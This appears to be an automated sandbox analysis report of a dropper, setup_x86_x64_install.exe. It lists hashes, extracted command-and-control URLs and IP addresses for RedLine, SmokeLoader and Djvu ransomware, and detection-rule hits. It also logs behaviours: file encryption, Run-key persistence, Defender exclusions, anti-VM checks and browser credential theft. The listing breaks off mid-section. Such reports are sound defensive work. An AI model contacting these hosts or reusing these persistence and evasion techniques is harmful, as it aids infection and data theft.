Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
30-09-2021 05:45
210930-gf4veagef9 1029-09-2021 21:32
210929-1dyp6agaam 1029-09-2021 18:54
210929-xkfldaffb2 10Analysis
-
max time kernel
1802s -
max time network
1805s -
platform
windows10_x64 -
resource
win10-de-20210920 -
submitted
29-09-2021 21:32
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
cd08a9c57ce8115745d3a99dec48847d
-
SHA1
2ea5cea16935f511935a86ea7a2903a44d593247
-
SHA256
52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc
-
SHA512
0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233
Malware Config
Extracted
http://shellloader.top/welcome
Extracted
C:\_readme.txt
djvu
manager@mailtemp.ch
supporthelp@airmail.cc
https://we.tl/t-2zbBkO06mv
Extracted
redline
ANI
45.142.215.47:27643
Extracted
redline
jamesfuck
65.108.20.195:6774
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
OneDriveSetup.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDriveSetup.exe -
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1500 5448 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5560 5448 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 5448 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10636 5448 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10308 5448 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral8/memory/5024-265-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral8/memory/5024-270-0x000000000041C5CA-mapping.dmp family_redline behavioral8/memory/1852-310-0x0000000002160000-0x000000000217F000-memory.dmp family_redline behavioral8/memory/1852-325-0x00000000023C0000-0x00000000023DE000-memory.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15ac1df9305ded09.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 6872 created 4496 6872 WerFault.exe ShadowVPNInstaller_t1.exe -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)
-
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
Processes:
resource yara_rule behavioral8/memory/4348-301-0x0000000002120000-0x00000000021F4000-memory.dmp family_vidar behavioral8/memory/4348-332-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar behavioral8/memory/3968-408-0x0000000002260000-0x0000000002334000-memory.dmp family_vidar behavioral8/memory/3968-428-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC54B9F92\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC54B9F92\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
cmd.exepowershell.exepowershell.exeWMIC.execmd.exeschtasks.execmd.execmd.exeMsiExec.exeflow pid process 43 764 cmd.exe 73 764 cmd.exe 96 764 cmd.exe 108 764 cmd.exe 116 764 cmd.exe 132 764 cmd.exe 158 764 cmd.exe 163 5768 powershell.exe 170 4912 powershell.exe 173 764 cmd.exe 176 764 cmd.exe 178 7412 WMIC.exe 29 764 cmd.exe 17 764 cmd.exe 43 764 cmd.exe 96 764 cmd.exe 73 764 cmd.exe 108 764 cmd.exe 116 764 cmd.exe 158 764 cmd.exe 132 764 cmd.exe 233 6304 cmd.exe 239 7832 schtasks.exe 242 2684 cmd.exe 243 7832 schtasks.exe 244 2684 cmd.exe 245 7832 schtasks.exe 248 7832 schtasks.exe 262 7832 schtasks.exe 263 7832 schtasks.exe 264 7832 schtasks.exe 265 7832 schtasks.exe 384 4912 powershell.exe 601 6856 cmd.exe 681 4660 MsiExec.exe 682 4660 MsiExec.exe 683 4660 MsiExec.exe 685 4660 MsiExec.exe 689 4660 MsiExec.exe 690 4660 MsiExec.exe 691 4660 MsiExec.exe 692 4660 MsiExec.exe 693 4660 MsiExec.exe 696 4660 MsiExec.exe 697 4660 MsiExec.exe 699 4660 MsiExec.exe 701 4660 MsiExec.exe 702 4660 MsiExec.exe 703 4660 MsiExec.exe 704 4660 MsiExec.exe 705 4660 MsiExec.exe 706 4660 MsiExec.exe 707 4660 MsiExec.exe 709 4660 MsiExec.exe 711 4660 MsiExec.exe 712 4660 MsiExec.exe 716 4660 MsiExec.exe 717 4660 MsiExec.exe 719 4660 MsiExec.exe 720 4660 MsiExec.exe 721 4660 MsiExec.exe 723 4660 MsiExec.exe 725 4660 MsiExec.exe 726 4660 MsiExec.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
Sayma.exeDllHost.exereg.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Sayma.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DllHost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts reg.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeWed151f5e3fd2.exeWed15228d911b9d5c.exeWed1529d8198a8f0c1.exeWed15ac1df9305ded09.exeWed15cdfe4f1ee8.exeWed154a69e494d5e99ca.exeWed150b6a68b74a9.exeWed15e2f113a40ce5.exeWed15fbd6ef41b4f.exeWed15bfd6504f7748c.exeWed15edb855a49.exeWed15c2e7469a14dca.exepostback.exeWed15566afaea59e.exeWed15fbd6ef41b4f.tmpLzmwAqmV.exeWed15e2f113a40ce5.exeSayma.exeChrome 5.exeFirstoffer.exechrome.exeSkVPVS3t6Y8W.EXeShadowVPNInstaller_t1.exeWed15e2f113a40ce5.exe1631231.scrInstall.EXEInstall.exereg.exe7712201.scrsetup.exesfx_123_206.exe6517854.scrmshta.exeWinHoster.exejhuuee.exe6020523.scrsetup_2.tmppli-game.exeConhost.exeschtasks.exesetup_2.tmp2610751.scr6571754.scr4MCYlgNAW.eXE5795491.scrbuild3.exeservices64.exeultramediaburner.exeGixesemegy.exeultramediaburner.tmpLyshopadiqi.exeUltraMediaBurner.exeConhost.exeInstall.exeINSTAL~1.EXEcmd.exeinstaller.exeWMIC.exesihost64.exegcleaner.exeautosubplayer.exepid process 1116 setup_installer.exe 1708 setup_install.exe 1852 Wed151f5e3fd2.exe 3840 Wed15228d911b9d5c.exe 2648 Wed1529d8198a8f0c1.exe 764 Wed15ac1df9305ded09.exe 1080 Wed15cdfe4f1ee8.exe 980 Wed154a69e494d5e99ca.exe 4136 Wed150b6a68b74a9.exe 4160 Wed15e2f113a40ce5.exe 4268 Wed15fbd6ef41b4f.exe 4284 Wed15bfd6504f7748c.exe 4300 Wed15edb855a49.exe 4348 Wed15c2e7469a14dca.exe 4372 postback.exe 4392 Wed15566afaea59e.exe 4512 Wed15fbd6ef41b4f.tmp 4968 LzmwAqmV.exe 4780 Wed15e2f113a40ce5.exe 5060 Sayma.exe 3732 Chrome 5.exe 3968 Firstoffer.exe 4388 chrome.exe 920 SkVPVS3t6Y8W.EXe 4496 ShadowVPNInstaller_t1.exe 5024 Wed15e2f113a40ce5.exe 1812 1631231.scr 4672 Install.EXE 4852 Install.exe 3800 reg.exe 4460 7712201.scr 2380 setup.exe 316 sfx_123_206.exe 4276 6517854.scr 4228 mshta.exe 5232 WinHoster.exe 5248 jhuuee.exe 5392 6020523.scr 5404 setup_2.tmp 5456 pli-game.exe 5620 Conhost.exe 6044 schtasks.exe 5504 setup_2.tmp 5528 2610751.scr 6140 6571754.scr 2216 4MCYlgNAW.eXE 4408 5795491.scr 4372 postback.exe 6216 build3.exe 7072 services64.exe 7136 ultramediaburner.exe 5592 Gixesemegy.exe 6332 ultramediaburner.tmp 6336 Lyshopadiqi.exe 5828 UltraMediaBurner.exe 4896 Conhost.exe 5868 Install.exe 2772 INSTAL~1.EXE 6304 cmd.exe 3568 installer.exe 7412 WMIC.exe 7680 sihost64.exe 7768 gcleaner.exe 7948 autosubplayer.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 16 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
DCCF.exedescription ioc process File renamed C:\Users\Admin\Pictures\EnableDisconnect.tiff => C:\Users\Admin\Pictures\EnableDisconnect.tiff.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\PublishUnlock.tif => C:\Users\Admin\Pictures\PublishUnlock.tif.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\SendInitialize.png => C:\Users\Admin\Pictures\SendInitialize.png.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\SwitchComplete.crw => C:\Users\Admin\Pictures\SwitchComplete.crw.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\WriteExit.raw => C:\Users\Admin\Pictures\WriteExit.raw.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\ConvertFromMount.tiff => C:\Users\Admin\Pictures\ConvertFromMount.tiff.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\DisconnectCheckpoint.png => C:\Users\Admin\Pictures\DisconnectCheckpoint.png.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\UnblockAssert.tiff => C:\Users\Admin\Pictures\UnblockAssert.tiff.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\WatchSubmit.crw => C:\Users\Admin\Pictures\WatchSubmit.crw.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\RenameRestart.tif => C:\Users\Admin\Pictures\RenameRestart.tif.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\SplitStep.crw => C:\Users\Admin\Pictures\SplitStep.crw.rigd DCCF.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromMount.tiff DCCF.exe File opened for modification C:\Users\Admin\Pictures\UnblockAssert.tiff DCCF.exe File renamed C:\Users\Admin\Pictures\ResumeGroup.crw => C:\Users\Admin\Pictures\ResumeGroup.crw.rigd DCCF.exe File renamed C:\Users\Admin\Pictures\ConfirmBackup.crw => C:\Users\Admin\Pictures\ConfirmBackup.crw.rigd DCCF.exe File opened for modification C:\Users\Admin\Pictures\EnableDisconnect.tiff DCCF.exe -
Checks BIOS information in registry 2 TTPs 25 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2483.exeZ58YFjny287dHiWTdWlvNYF0.exeZ2ECp8JodQbWGsvkzsmoyMv5.exeE60.exe6517854.scr6642635.scr5957.exeWed15566afaea59e.exeMoney10k_.exeOITjDfOmO1EwVIRrcSQjebGx.exeInstall.exeInstall.exerundll32.exe5795491.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Z58YFjny287dHiWTdWlvNYF0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Z2ECp8JodQbWGsvkzsmoyMv5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6517854.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6642635.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5957.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6517854.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6642635.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5957.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Z58YFjny287dHiWTdWlvNYF0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Z2ECp8JodQbWGsvkzsmoyMv5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OITjDfOmO1EwVIRrcSQjebGx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5795491.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5795491.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OITjDfOmO1EwVIRrcSQjebGx.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeQoshaemejyjy.exebXhtqdI.exeGixesemegy.execmd.exeqT3dWYBP7ZsuOrwW4ZcUbjl6.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Qoshaemejyjy.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation bXhtqdI.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Gixesemegy.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation qT3dWYBP7ZsuOrwW4ZcUbjl6.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeWed15fbd6ef41b4f.tmpsetup_2.tmprundll32.exesetup_2.tmpforfiles.exerundll32.EXErundll32.exeConhost.exerundll32.exeWed15c2e7469a14dca.exeFirstoffer.exeinstaller.exeautosubplayer.exeMsiExec.exeHelper.exerundll32.exechoice.exeMsiExec.exeIX1zGxX9efDhwsZ12BGQ_ajS.tmpbuild2.exereg.exeautosubplayer.exerundll32.exerundll32.exerundll32.exeMsiExec.exepid process 1708 setup_install.exe 1708 setup_install.exe 1708 setup_install.exe 1708 setup_install.exe 1708 setup_install.exe 4512 Wed15fbd6ef41b4f.tmp 5404 setup_2.tmp 5344 rundll32.exe 5504 setup_2.tmp 5736 forfiles.exe 6992 rundll32.EXE 6992 rundll32.EXE 6392 rundll32.exe 6820 Conhost.exe 6820 Conhost.exe 4744 rundll32.exe 4348 Wed15c2e7469a14dca.exe 4348 Wed15c2e7469a14dca.exe 3968 Firstoffer.exe 3968 Firstoffer.exe 3568 installer.exe 3568 installer.exe 7948 autosubplayer.exe 3568 installer.exe 8120 MsiExec.exe 8120 MsiExec.exe 7948 autosubplayer.exe 8580 Helper.exe 6196 rundll32.exe 1280 choice.exe 1280 choice.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 7948 autosubplayer.exe 7948 autosubplayer.exe 7948 autosubplayer.exe 8584 IX1zGxX9efDhwsZ12BGQ_ajS.tmp 1448 build2.exe 1448 build2.exe 7948 autosubplayer.exe 10224 reg.exe 7948 autosubplayer.exe 4640 autosubplayer.exe 10908 rundll32.exe 10908 rundll32.exe 4640 autosubplayer.exe 7948 autosubplayer.exe 7948 autosubplayer.exe 4760 rundll32.exe 7948 autosubplayer.exe 7384 rundll32.exe 4660 MsiExec.exe 4660 MsiExec.exe 4660 MsiExec.exe 3568 installer.exe 4660 MsiExec.exe 4660 MsiExec.exe 10020 MsiExec.exe 10020 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exe themida C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15566afaea59e.exe themida behavioral8/memory/4392-222-0x0000000000A90000-0x0000000000A91000-memory.dmp themida -
Processes:
rundll32.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0" rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OnpGSK = "0" rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
Conhost.exereg.exeOneDriveSetup.exeInstall.EXEInstaller.exe7712201.scrDCCF.exeMicrosoftEdgeCP.exeSayma.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Raeletolamae.exe\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" OneDriveSetup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Install.EXE Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7712201.scr Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6119ec7f-c167-4e31-946b-c0e87ad60709\\DCCF.exe\" --AutoStart" DCCF.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\kaklvdty = "\"C:\\Users\\Admin\\yojvpbfx.exe\"" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Install.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gaxofofomy.exe\"" Sayma.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
schtasks.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab schtasks.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Wed15566afaea59e.exe5795491.scrFC10.exeZ58YFjny287dHiWTdWlvNYF0.exeOITjDfOmO1EwVIRrcSQjebGx.exe6642635.scrMoney10k_.exe6517854.scrZ2ECp8JodQbWGsvkzsmoyMv5.exeE60.exeOtZ3Bgr_O8lNYovkhfW9MgZl.exe5957.exe2483.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5795491.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FC10.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Z58YFjny287dHiWTdWlvNYF0.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OITjDfOmO1EwVIRrcSQjebGx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6642635.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Money10k_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6517854.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Z2ECp8JodQbWGsvkzsmoyMv5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E60.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OtZ3Bgr_O8lNYovkhfW9MgZl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5957.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2483.exe -
Drops Chrome extension 2 IoCs
Processes:
bXhtqdI.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json bXhtqdI.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json bXhtqdI.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
bXhtqdI.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini bXhtqdI.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
